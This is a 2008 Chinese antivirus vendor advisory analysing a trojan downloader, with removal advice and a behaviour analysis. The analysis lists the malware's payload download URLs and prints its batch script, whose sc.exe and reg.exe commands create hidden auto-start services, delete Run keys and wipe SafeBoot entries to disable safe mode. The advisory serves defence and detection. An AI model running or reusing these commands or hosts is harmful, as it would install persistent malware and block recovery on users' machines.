捕获时间
2008-11-5
病毒摘要
该样本是使用“ vc”编写的“木马下载器”,由微点主动防御软件自动捕获,未加壳,长度为“107,512 字节”,图标为,使用“exe”扩展名,通过“网页木马”、“文件捆绑”等途径植入用户计算机,运行后下载其他木马程序到本地执行。
感染对象
windows 2000/windows xp/windows 2003
传播途径
网页木马、文件捆绑
防范措施
已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”,请直接选择删除处理(如图1);
图1 主动防御自动捕获未知病毒(未升级)
如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"trojan-downloader.win32.agent.aiym”,请直接选择删除(如图2)。
图2 升级后截获已知病毒
对于未使用微点主动防御软件的用户,微点反病毒专家建议:
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取ag旗舰厅首页的技术支持。
3、开启windows自动更新,及时打好漏洞补丁。
病毒分析
该样本程序被执行后,等待外网联通,一旦处于联通状态,便从下列位置之一下载加密文件到%systemroot%下:
|
http ://122.224.9.151/kills.txt?t1=[random numbers]
http ://lmok1234xing.w239.dns911.cn/kills.txt?t3=[random numbers]
http ://122.224.9.151/kills.txt?t2=[random numbers]
http ://baiduasp.web194.dns911.cn/kills.txt?4=[random numbers]
http ://www.lmok123.com/kills.txt?t5==[random numbers] |
|
其后缀为“txt”,名称为随机数,随后删除并在此目录下随机生成一个特定文件并隐藏运行之;此文件拷贝自身分别到目录%systemroot%\system32与%systemroot%下,名称均是随机生成,并在目录%allusersprofile%\「开始」菜单\程序\启动\下创建快捷方式,文件属性均为只读,隐藏,达到随机启动隐藏自身效果之一;还在目录%allusersprofile%\「开始」菜单\程序\启动\下生成一个随机名称的自删除批处理,达到创建开机服务实现另一个随机启动隐藏自身效果并修改相关注册表实现破坏安全模式,其主体内容如下:
|
sc.exe create 对应的随机服务名 binpath= "c:\windows\随机名.exe ahnkz6u" type= own type= interact start= auto displayname= 随机生成的显示服务名
sc.exe description对应的随机服务名描述服务的随机文字
reg.exe delete hklm\software\microsoft\windows\currentversion\run /f
reg.exe delete hklm\system\currentcontrolset\control\safeboot\network\
{4d36e967-e325-11ce-bfc1-08002be10318} /f
reg.exe delete hklm\system\currentcontrolset\control\safeboot\minimal\
{4d36e967-e325-11ce-bfc1-08002be10318} /f
reg.exe delete hklm\system\controlset001\control\safeboot\network\
{4d36e967-e325-11ce-bfc1-08002be10318} /f
reg.exe delete hklm\system\controlset001\control\safeboot\minimal\
{4d36e967-e325-11ce-bfc1-08002be10318} /f
sc.exe create另外随机生成的服务名binpath= "c:\windows\system32\另一个随机名.exe oole996tls" type= own type= interact start= auto displayname= 7ncqo
sc.exe description 另外随机生成的服务名 描述服务的随机文字
del %0
del %0
exit |
|
并继续从上述的网站下载其它病毒木马,实现感染与接受黑客控制的目的。
|